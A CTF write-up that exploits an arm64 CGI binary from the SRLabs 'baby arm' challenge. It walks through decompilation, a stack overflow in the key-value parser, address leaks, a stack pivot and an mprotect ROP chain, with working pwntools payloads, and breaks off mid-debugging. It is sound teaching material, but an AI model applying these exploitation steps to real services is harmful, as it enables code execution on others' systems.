ElBlo

[pwn] SRLabs CTF: baby arm

September 6, 2023

url: https://hackingchallenge.srlabs.de/challenges

Description

The challenge is served over a CGI-bin arm64 program. It’s a C program that parses the request body as key=value pairs. It then prints all the times name=something appear in the request body.

TL;DR (skip if you don’t want spoilers)

The key-value pairse are copied out from the buffer into two arrays (keys, values). You can exploit a buffer overflow the control where the key gets copied, but it has to be “close” in the stack. You also cannot write NUL-bytes, nor &, nor =.

If you provide the maximum number of key-valye pairs (0x34), you will still have plenty of space on the buffer and the stack address will be leaked into x7.

Using the buffer overflow, overwrite some values on the stack to make a rop chain to pivot the stack onto the value in x7. From there, continue ropping until you get what you want.

Program Analysis.

`main` disassembly

Disassembling the main function with ghidra has some problems, so feel free to skip reading it.

int main(void) {
  undefined *puVar1;
  int cmp;
  ssize_t read_n;
  undefined8 unaff_x19;
  char *keys;
  undefined8 unaff_x20;
  char *values_iter;
  undefined8 unaff_x21;
  undefined8 unaff_x22;
  undefined8 unaff_x23;
  undefined8 unaff_x24;
  undefined8 unaff_x29;
  undefined8 unaff_x30;
  undefined auStack_60000 [393216];
  bool found_name;
  undefined *global_data;
  char *values_start;
  
  global_data = (undefined *)register0x00000008;
  do {
    puVar1 = global_data;
    *(undefined8 *)(puVar1 + -0xfc00) = 0;
    global_data = puVar1 + -0x10000;
  } while (puVar1 + -0x10000 != auStack_60000);
  *(undefined8 *)(puVar1 + -0x15950) = unaff_x29;
  *(undefined8 *)(puVar1 + -0x15948) = unaff_x30;
  *(undefined8 *)(puVar1 + -0x15940) = unaff_x19;
  *(undefined8 *)(puVar1 + -0x15938) = unaff_x20;
  *(long *)(puVar1 + 0x4fff8) = __stack_chk_guard;
  read_n = read(0,puVar1 + 0x1d378,0x32c80);
  puts("Content-type: text/html\n");
  if ((int)read_n < 1) {
    puts("<h1>Please provide your name with the name= parameter.</h1>");
  }
  else {
    *(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
    *(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
    keys = puVar1 + -0x15908;
    values_start = puVar1 + 0x3d38;
    *(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
    *(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
    found_name = false;
    parse_body(puVar1 + 0x1d378,keys,values_start,puVar1 + -0x1590c);
    values_iter = values_start;
    do {
      while( true ) {
        if (*keys == '\0') goto LAB_00400628;
        cmp = strncmp(keys,"name",4);
        if (cmp != 0) break;
        keys = keys + 2000;
        printf("<h1>Hello, %s!</h1>\n",values_iter);
        values_iter = values_iter + 2000;
        found_name = true;
        if (keys == values_start) goto LAB_00400628;
      }
      keys = keys + 2000;
      values_iter = values_iter + 2000;
    } while (keys != values_start);
LAB_00400628:
    if (found_name) {
      unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
      unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
      unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
      unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
    }
    else {
      puts("<h1>What is your name?</h1>");
      unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
      unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
      unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
      unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
    }
  }
  if (*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard == 0) {
    return 0;
  }
  *(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
  *(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
  *(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
  *(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,0,puVar1 + 0x4e6b0,
                   *(long *)(puVar1 + 0x4fff8) - __stack_chk_guard);
}

If you provide no input, it will print a message.
There are three arrays, keys, values, and read_buffer.
- keys comes first, with 0x34-2000 byte entries. Used to store the keys of the body.
- values is next, with 0x34-2000 byte entries. Used to store the values associated with the keys.
- read_buffer is where our input gets copied to, it has a size of 0x32c80 bytes.
After reading the input, main calls parse_body, passing the three arrays.
When that’s done, main will iterate over keys and values, and print all the values whose key has name as a prefix.
At the end, if no name was printed, the program will print <h1>What is your name?<h1>.

Now, let’s look at parse_body.

`parse_body` disassembly

void parse_body(char* body,char* keys,char *values, undefined4* param_4) {
  char* src;
  size_t len;
  long i;
  int count;
  char* saveptr = NULL;
  char* kv_ptr = NULL;
  char[32] dst = {0};
  char* key_ptr = NULL;
  char* value_ptr = NULL;
  uint64_t stack_canary = __stack_chk_guard;
  char c;
  
  src = strtok_r(body, "&", &saveptr);
  if (src == NULL) {
    *param_4 = 0xffffffff;
    kv_ptr = NULL;
  } else {
    count = 0;
    do {
      kv_ptr = src;
      key_ptr = keys;
      value_ptr = values;
      len = simd_strlen(src);
      // This can overflow dst and overwrite key_ptr and value_ptr
      strncpy(&dst, src, len & 0xffffffff);
      i = 0;
      do {
        // Copy key into key_ptr (points to keys)
        c = src[i];
        if (c == '=' || c == '\0') break;
        key_ptr[i] = c;
        i += 1;
        src = kv_ptr;
      } while (i != 2000);
      // Copy value into value_ptr (points to values)
      kv_ptr = strchr(&dst, L'=');
      if (kv_ptr != NULL) {
        strncpy(value_ptr, kv_ptr + 1, 2000);
        value_ptr[1999] = '\0';
      }
      count += 1;
      src = strtok_r(NULL, "&", &saveptr);
      keys = keys + 2000;
      values = values + 2000;
      kv_ptr = src;
    } while (count != 0x34 && src != NULL);
  }
  if (stack_canary - __stack_chk_guard == 0) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,0,stack_canary - __stack_chk_guard);
}

The function parse_body is in charge of parsing the input buffer into the key-value pair arrays.
- It uses strtok_r to tokenize the & chars.
- Every time it sees an &, it will:
  - Copy the address of the current keys and values pointer into the stack (key_ptr and value_ptr).
  - Copies from the current the data from the read buffer until the found & into a stack buffer (dst).
  - Copy from the read buffer into the address pointed to by key_ptr, until it either finds a NUL-byte or an =.
  - Look for a = in the dst buffer and strncpy from that position into the value_buf, up to 2000 chars.
  - Note that both key_ptr and value_ptr can be overwritten if our input is too long.
- This is repeated 0x34 times, or until we don’t have any more & characters.

Other details

The binary is not PIE. It is always loaded at the same address, but the stack is randomized.
We have some control over the environment variables, for example, the user agent that we set in our request will end up as an env var.
The read call for reading the request body is very large, but in reality we will only be able to read ~32k bytes.
There’s a limit of 0x34 key-value pairs that will be processed.

Exploit Ideas

With all these details, an idea of a possible attack would be to use the write-what-where primitive to change some of the return addresses to start ropping, and then pivot our stack to the read_buffer to do a longer rop-chain. Sadly, our read_buffer is too far away from where key_ptr points to, we will need to figure out a way to work around that.

Another challenge is that, on each iteration of the loop in parse_body, the key and value ptrs increment by 2000, so the pointer that we are modifying keeps changing.

Let’s set up everything so we can start playing with this challenge :)

Remote Setup, with requests library.

Trying this challenge is super easy, we just need to make a simple web request:

import requests

def run_remote(payload):
    url = 'http://5.75.229.171:1337/cgi-bin/pwn.cgi'
    return requests.post(url, data=payload).content

>>> run_remote(b'name=test')
b'<h1>Hello, test!</h1>\n'

You can also change the request headers, but this seems to be good enough for now.

Local Setup with usermode QEMU.

Given that I don’t have an arm64 machine, the easiest way to study the binary locally is to use usermode QEMU. This is a QEMU mode in which userspace code gets emulated, while kernel code gets routed to the real linux kernel.

Note that usermode QEMU doesn’t provide a security boundary or isolation in any way. Don’t use it to run untrusted binaries.

~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 pwn.cgi
Content-type: text/html

<h1>Hello, test!</h1>

Limitations

Note that this setup has various limitations:

It doesn’t seem to have aslr, which causes the stack to be alwas in the same place.
- This can be helpful to iterate fast and get an exploit working, but our solution needs to work with aslr eventually.
- Note that we can simulate some randomness by messing with environment variables when we start the program.
The memory mappings might not be the same ones as in the real program. QEMU doesn’t provide an easy way of printing the memory mappings either.
- One option that I found useful was to check /proc/pid/maps on the QEMU process: the program was loaded on the lower end of the address space.
- Some failures might not show up correctly. For example, if the program tries to write outside of the low-memory area, it might cause issues with QEMU or might not be reported correctly.
This is not the same setup as with the CGI-bin script.
- Our input is actually an HTTP request. We have control over some headers that end up in the environment variables.
- The output of the program must start with a content type header: Content-Type: text/plain\n\n.
- Apache reads our entire request on one go and sends it to the program.
  - For example, one way to defeat aslr, could be to make the program print a stack address, and then overide a return address to execute main again, causing it to read our input again, with the same memory layout. This wouldn’t work on a CGI-Bin script.

strace

Usermode QEMU also has an option for logging the system calls:

~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 -strace pwn.cgi
10903 brk(NULL) = 0x000000000049a000
10903 brk(0x000000000049ab78) = 0x000000000049ab78
10903 set_tid_address(4825296,4821024,4825280,4825536,4778064,4827120) = 10903
10903 set_robust_list(4825312,24,4825312,1,0,4825360) = -1 errno=38 (Function not implemented)
10903 Unknown syscall 293
10903 uname(0x5500800078) = 0
10903 prlimit64(0,3,0,365080609256,4827160,88) = 0
10903 readlinkat(AT_FDCWD,"/proc/self/exe",0x00000055007ff130,4096) = 38
10903 getrandom(4820672,8,1,4825088,4786664,0) = 8
10903 brk(0x00000000004bbb78) = 0x00000000004bbb78
10903 brk(0x00000000004bc000) = 0x00000000004bc000
10903 mprotect(0x000000000048e000,16384,PROT_READ) = 0
10903 read(0,0x7cd468,208000) = 9
10903 newfstatat(1,"",0x000000550079a638,0x1000) = 0
Content-type: text/html
10903 write(1,0x49b020,24) = 24

10903 write(1,0x49b020,1) = 1
<h1>Hello, test!</h1>
10903 write(1,0x49b020,22) = 22
10903 exit_group(0)

gdb

Another good thing about usermode qemu: it lets us hook a debugger to our process.

Make sure you have gdb-multiarch installed

$ sudo apt install gdb-multiarch

Launch qemu with the gdb flag:

$ echo -n "name=marco" | env -i qemu-aarch64 -g 1234 ./pwn.cgi

And then launch gdb and connect to it:

$ gdb-multiarch ./pwn.cgi
...
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c

pwntools

Using pwntools to work on the exploit will be a real time saver.

Given that our payload cannot be dynamic, the setup to run it with pwntools is easy:

$ python3 pip install pwntools

import pwn
pwn.context.update(arch='aarch64', os='linux')
pwn.context.log_level = 'critical'

def run(payload):
    with pwn.process(['qemu-aarch64', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_strace(payload):
    with pwn.process(['qemu-aarch64', '-strace', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_gdb(payload):
    with pwn.process(['qemu-aarch64', '-g', '1234', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

Improving our understanding of the problem

We have decompiled the program, have a reasonable understanding of how it works, and have the tools to play with it locally. Let’s see what we can learn about it.

Confirming the `dst` buffer size.

First, let’s double check the size of the dst buffer in parse_body:

>>> from pwnlib.util.cyclic import cyclic, cyclic_find
>>> print(run(b'name=' + cyclic(10)).decode())
Content-type: text/html

<h1>Hello, aaaabaaaca!</h1>
>>> print(run(b'name=' + cyclic(100)).decode())
Content-type: text/html

qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Let’s see with strace:

>>> print(run_with_strace(b'name=' + cyclic(100)).decode())
(...)
11337 write(1,0x49b020,24) = 24

11337 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Sadly, this is one of the issues I mentioned earlier about usermode QEMU: the segmentation fault is happening in a memory region outside the program allowed adress space, and QEMU is not reporting it. Let’s shrink our payload until see a crashing address:

>>> print(run_with_strace(b'name=' + cyclic(34)).decode())
(...)
Content-type: text/html
11354 write(1,0x49b020,24) = 24

11354 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x0000696161616861} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped

With the address, we can now get the offset:

>>> >>> pwn.p64(0x0000696161616861)
b'ahaaai\x00\x00'
>>> cyclic_find(b'ahaaai\x00\x00')
27

This means that our buffer has a size of 27+5 = 32 bytes. ✅︎

Print the keys pointers.

From reading the decompiled source code, we know that it will write the keys from src and the values from the dst buffer after the first =, with a strncpy. In our dst buffer, there are no NUL-bytes getting copied (you copy everything until a NUL-byte or a &), so if we end up key-value pair in 32 bytes, we should get that copied + whatever is after until a NUL-byte into the values array. Furthermore, if we use name as the key, it will be printed out by the program at the end.

This is the code I am talking about:

  // Copy value into value_ptr (points to values)
  kv_ptr = strchr(&dst, L'=');
  if (kv_ptr != NULL) {
    strncpy(value_ptr, kv_ptr + 1, 2000);
    value_ptr[1999] = '\0';
  }

Let’s see what happens:

>>> run(b'name=' + b'a' * (32-5))
b'Content-type: text/html\n\n<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xb3y!</h1>\n'
>>> x = b'\xb8\xb3y' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0x79b3b8'

After our name (all a’s), there’s some extra bytes. Those would be the keys_ptr value until the first NUL-byte. QEMU usermode places the stack at 0x5500aabbcc, so we only see the last 3 digits. If we run it against the real website, we get a better value.

>>> run_remote(b'name=' + b'a' * (32-5))
b'<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xe0d\xc5\xff\xff!</h1>\n'
>>> x = b'\xb8\xe0d\xc5\xff\xff' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
0xffffc564e0b8

Note that we can use the same name multiple times, and thus, leak all the addresses from the keys array:

def leak_keys_addresses():
    payload = b'name=' + bytearray(b'a')*27
    payloads = [payload]*0x35 # one more for good measure.
    payload = b'&'.join(payloads)

    response = run(payload).content
    for line in response.split(b'\n'):
        if not b'aaaaaaaaaaaaaaaaaaaaaaaaaaa' in line: continue
        if len(line) == 0: continue
        line = line[38:-6] # Take out the prefix and these 6 chars: !</h1>
        ptr = line + b'\x00'*8
        ptr = pwn.u64(ptr[:8])
        print(hex(ptr))

>>> leak_keys_addresses()
0x79b3b8
0x79bb88
0x79c358
(...)
0x7b3a58
0x7b4228

And we can see that each of them is 2000 bytes apart:

>>> 0x79bb88 - 0x79b3b8
2000

✅︎

Analyzing the memory layout with gdb.

We can launch gdb and stop at the beginning of parse_body to analyze the parameters.

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b parse_body
Breakpoint 1 at 0x400868
(gdb) c
Continuing.

Breakpoint 1, 0x0000000000400868 in parse_body ()
(gdb) p /x $x0
$1 = 0x55007ce038
(gdb) p /x $x1
$2 = 0x550079b3b8
(gdb) p /x $x2
$3 = 0x55007b49f8
(gdb) p /x $x3
$4 = 0x550079b3b4
(gdb) p /x $sp
$5 = 0x550079b2d0

x0 is our read buffer. x1 is the beginning of the keys array. x2 is the beginning of the values array. I am not clear on what x3 is used for.

(gdb) p /x $x1 + (2000 * 0x34)
$6 = 0x55007b49f8
(gdb) p /x $x2 + (2000 * 0x34)
$7 = 0x55007ce038

Also, at the end of the keys array, is the values array, and the end of that, it’s the input buffer.

This is the code at the beginning of parse_body:

(gdb) x /20i parse_body
   0x400860 <parse_body>:       stp     x29, x30, [sp, #-160]!
   0x400864 <parse_body+4>:     adrp    x4, 0x491000 <tunable_list+1320>
=> 0x400868 <parse_body+8>:     movi    v0.4s, #0x0
   0x40086c <parse_body+12>:    mov     x29, sp

The stack takes 160 bytes, and x29 and x30 are stored on top.

Something that also interests us, is the function epilogue, to see how the values from the stack are restored and what we have control over.

   0x400998 <parse_body+312>:   ldp     x19, x20, [sp, #16]
   0x40099c <parse_body+316>:   ldp     x21, x22, [sp, #32]
   0x4009a0 <parse_body+320>:   ldp     x23, x24, [sp, #48]
   0x4009a4 <parse_body+324>:   ldp     x29, x30, [sp], #160
   0x4009a8 <parse_body+328>:   ret

To get a complete view, let’s set a breakpoint in the middle of the function and analyze the stack.

(gdb) x /20i $pc
=> 0x4008f4 <parse_body+148>:   ldr     x1, [sp, #136]
   0x4008f8 <parse_body+152>:   strb    w0, [x1, x2]
   0x4008fc <parse_body+156>:   add     x2, x2, #0x1
   0x400900 <parse_body+160>:   cmp     x2, #0x7d0

This is where we store the c character from the key into the value pointed by key_ptr, which lives in sp + 136 (0x88)

Now, let’s print the stack contents (with some notes):

(gdb) x /40gx $sp
0x550079b2d0:   0x000000550079b370      0x00000000004005d8 x29, x30
0x550079b2e0:   0x000000550079b3b8      0x00000055007b49f8 x19, x20
0x550079b2f0:   0x0000000000458270      0x00000055007b49f8 x21, x22
0x550079b300:   0x0000000000458278      0x0000000000000000 x23, x24
0x550079b310:   0x0000000000000018      0x00000000004925c8
0x550079b320:   0x0000000000493c30      0x00000055007ce042
0x550079b330:   0x00000055007ce038      0x72616d3d656d616e dst
0x550079b340:   0x0000000000006f63      0x0000000000000000
0x550079b350:   0x0000000000000000      0x000000550079b3b8 keys_ptr (sp + 0x88)
0x550079b360:   0x00000055007b49f8      0xa36829a47092db00 values_ptr, stack canary
0x550079b370:   0x0000005500800cc0      0x0000000000400a64 main's stack.

Exploiting the buffer overflow (no aslr)

In this run, the value of keys_ptr is 0x550079b3b8, and parse_body’s return address is stored in 0x550079b2d8. This means that if we can overwrite the first two bytes of keys_ptr with b2d8, we should be able to jump to wherever we want.

At the beginning of the main function, there’s a call to puts at address 0x400684:

if (read_bytes < 1) {
  puts("<h1>Please provide your name with the name= parameter.</h1>");
}

Remember: we need to provide a key=value pair, the value in the key will be copied to where keys_ptr is pointing, and we can overwrite it by providing a long value. Here we want the key to be 0x400684, and the value to overflow the first two bytes of keys_ptr with b2d8.

>>> payload = b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'

Success! ✅︎

Note that we had to guess two bytes to put in the keys_ptr address. This will be problematic when we have to deal with aslr. But let’s ignore the elephant in the room for a while, and let’s think about how to exploit this issue.

We can see that if we can modify the x30 register on the stack, we can also modify the other registers (x19…x24, x29), and almost everything that is “close” in the stack, like main’s return address.

Stack Pivot

We also have a buffer in memory with arbitrary data. If we could pivot the stack to our buffer, we can chain any number of rop gadgets and take over from there.

Using ropper to find gadgets

There are a lot of tools to search for rop gadgets, let’s use ropper.

$ python3 pip install ropper

$ ropper -f pwn.cgi --search "mov sp"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov sp

[INFO] File: pwn.cgi
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 
0x000000000040e408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x60; ret; 
0x0000000000448d74: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 
0x0000000000441adc: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldr x23, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 
0x000000000044aed8: mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;

(Side note and useful tip, % works as a wildcard, and ? works as a single-character wildcard).

All of the gadgets mov from x29, to sp, so we need to modify the value of x29 in memory. From those gadgets, the first one is the one that gives us the most control (less stack usage, and most registers loaded)

So let’s pick that one (address 0x440408), and overwrite x30 with it, and put our read address in x29. The addresses that we want to change are 0xb2d8 and 0xb2d0, respectively.

Now, we know that our read buffer is at 0x55007ce038, and the value stored for x29 is 0x550079b370, so we need to change 3 bytes in total. We also need to figure out what to put there. We can pad the message with 0s just so the calculations are easier. We could also use a rop sled such that no matter where we fall, we will eventually rop our way towards our destination.

Keep in mind that in aarch64, the stack pointer must be aligned to 16 bytes.

>>> hex(0x55007ce038 + 0x58)
'0x55007ce090'

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00400684) # x30
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(0xdeadbeef) # x23
  rop.raw(0xdeadbeef) # x24

  payload += rop.chain()
  return payload

>>> payload = rop()
>>> payload
b'\x08\x04D=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd8\xb2&\x90\xe0|=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd0\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x84\x06@\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00' 
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\nqemu: uncaught target signal 11 (Segmentation fault) - core dumped\n'

The address of the function to print the string was only present in our buffer, well after the end of the initial payload. This means that we were succesful in doing a stack pivot and executing from there.

Building a rop-chain

Now that we can execute stuff out off our buffer, we can start building a rop chain that allows us to execute arbitrary code. Ideally, we would just want to open the flag and print it, but it seems easier to first add a bit more flexibility by allowing for arbitrary code execution.

Some alternatives:

mprotect our own stack mapping, allowing for RWX permissions.
mprotect the binary’s mappings, allowing for RWX permissions + copying our code there.
mmap something new, and copying our code there.

It all depends on what rop gadgets we can find. To me it was easier to go with the second option, so let’s go with that.

Making Linux system calls in aarch64 requires us to set the system call number in x8 and issue an svc #0 instruction.

Here is one rop gadget with: svc #0:

$ ropper -f pwn.cgi --search "svc #0"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: svc #0

[INFO] File: pwn.cgi
0x000000000041f45c: svc #0; cmn w0, #1, lsl #12; b.hi #0x1f470; mov w0, #0; ret; 
0x000000000041f388: svc #0; cmn x0, #0xfff; b.hs #0x1f398; ret; 
(...)
0x00000000004138e0: svc #0; ret;

We can also call mprotect directly, as it is in our binary:

(gdb) x /10i mprotect
   0x420440 <mprotect>: nop
   0x420444 <mprotect+4>:       mov     x8, #0xe2                       // #226
   0x420448 <mprotect+8>:       svc     #0x0
   0x42044c <mprotect+12>:      cmn     x0, #0xfff
   0x420450 <mprotect+16>:      b.cs    0x420458 <mprotect+24>  // b.hs, b.nlast
   0x420454 <mprotect+20>:      ret
   0x420458 <mprotect+24>:      b       0x424900 <__syscall_error>

Which should save us from having to look up one extra gadget.

Return to x30

In aarch64, ret doesn’t pop up anything from the stack, instead the processor jumps to whatever is in the x30 register. So we need to take that into account when looking for gadgets.

Some of the gadgets will do ldp x29, x30, [sp], #something, ..., ret, meaning that they will load x30 from the stack, advance the stack, and then return to x30. If after that one, we use a gadget with a simple ret, like the one above, we will end up in an infinite loop (x30 will not be changing).

One option is to use a gadget that branches using another register (only br, as blr also sets the link register).

The idea to execute ret-only gadgets would be to find a gadget that does:

ldp/ldr xN, [sp, #k]
ldp x29, x30, [sp], #something
br xN

We don’t really care about the order of the first two, though. I used the following query in ropper to find one such gadget:

$ ropper -f pwn.cgi --search "%ldp x29, x30%br"
(...)
0x000000000042b788: ldr x16, [sp, #0x60]; ldp x0, x1, [sp, #0x90]; ldp x29, x30, [sp], #0x100; br x16; 
0x0000000000427d0c: ldr x16, [sp, #0x60]; ldp x1, x0, [sp, #0x78]; ldp x29, x30, [sp], #0xb0; br x16; 
0x000000000042988c: ldr x16, [sp, #0x60]; ldp x29, x30, [sp], #0xf0; br x16; 
(...)

Let’s take a look at the second one:

0x0000000000427d0c:
  ldr x16, [sp, #0x60];
  ldp x1, x0, [sp, #0x78];
  ldp x29, x30, [sp], #0xb0;
  br x16;

Load x16 from the stack (sp + 0x60) ✓
Load x0, x1 from the stack (sp + 0x78, sp + 0x80) ✓
Load x29, x30 from the stack and advance it by 0xb0 ✓
Branch to x16 ✓

So we can put the address of mprotect in x16, the first two arguments in x0, and x1, and then the address of the next gadget in x30.

Calling `mprotect`

Finding an `x2`-load gadget.

We have found a gadget that allows us to call mprotect with custom values of x0, and x1. Remember that mprotect takes three parameters:

int mprotect(void* addr, size_t size, int flags)

So we need a gadget that sets x2 with the flags that we want (PROT_READ|PROT_WRITE|PROT_EXEC). Again, we have multiple options:

Find a gadget that sets that specific constant in x2.
Find a gadget that loads a value into x2 from the stack.
Mov from a previously controlled register into x2.

The queries for the first two options didn’t yield anything useful:

$ ropper -f pwn.cgi --search "mov x2, #"
$ ropper -f pwn.cgi --search "ldr x2,"

But the last one did:

$ ropper -f pwn.cgi --search "mov x2, x%"
(...)
0x00000000004057dc: mov x2, x23; mov x1, x27; mov x0, x26; blr x24;
(...)

This gadget will:

Move x23 into x2 (we control x23, as it was picked up from the stack). ✓
Move x27 into x1 (we don’t care, as we will overwrite it).
Move x26 into x0 (we don’t care, as we will overwrite it).
Branch with link into x24 (we control x24, as it was picked up from the stack). ✓

Testing the partial chain

So now we can do:

Stack pivot gadget, setting:

x30 (sp + 0x08) to x2-load gadget address (0x4057dc).
x23 (sp + 0x30) to PROT_READ|PROT_WRITE|PROT_EXEC.
x24 (sp + 0x38) to x16-branch gadget address (0x427d0c).

x2-load gadget. No stack usage.
x16-branch gadget address, setting:

x16 (sp + 0x60) to mprotect.
x1 (sp + 0x78) to the mapping address.
x2 (sp + 0x80) to the mapping size.
x30 (sp + 0x08) to the address of the next gadget (print address).
Some extra data to fill the stack (the gadget advances the stack by 0xb0 bytes).

Which address do we want to mprotect? Well, let’s see which mappings are available.

$ readelf -Wl ./pwn.cgi 

Elf file type is EXEC (Executable file)
Entry point 0x400700
There are 6 program headers, starting at offset 64

Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x07de74 0x07de74 R E 0x10000
  LOAD           0x07e830 0x000000000048e830 0x000000000048e830 0x0057f8 0x00ae98 RW  0x10000
  NOTE           0x000190 0x0000000000400190 0x0000000000400190 0x000044 0x000044 R   0x4
  TLS            0x07e830 0x000000000048e830 0x000000000048e830 0x000020 0x000068 R   0x8
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
  GNU_RELRO      0x07e830 0x000000000048e830 0x000000000048e830 0x0037d0 0x0037d0 R   0x1

We can pick the last page of the executable code, hoping that it will not collide with any code. So mapping_addr = 0x47d000, mprotect_size = 0x1000.

import mmap

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00400684) # x30, puts function.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  payload += rop.chain()
  return payload

We can follow along with gdb!

>>> payload = rop()
>>> run_with_gdb(payload)

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b *0x400998
Breakpoint 5 at 0x400998
(gdb) c
Continuing.

Breakpoint 5, 0x0000000000400998 in parse_body ()
(gdb) x /20i $pc
=> 0x400998 <parse_body+312>:   ldp     x19, x20, [sp, #16]
   0x40099c <parse_body+316>:   ldp     x21, x22, [sp, #32]
   0x4009a0 <parse_body+320>:   ldp     x23, x24, [sp, #48]
   0x4009a4 <parse_body+324>:   ldp     x29, x30, [sp], #160
   0x4009a8 <parse_body+328>:   ret
(gdb) x /2gx $sp
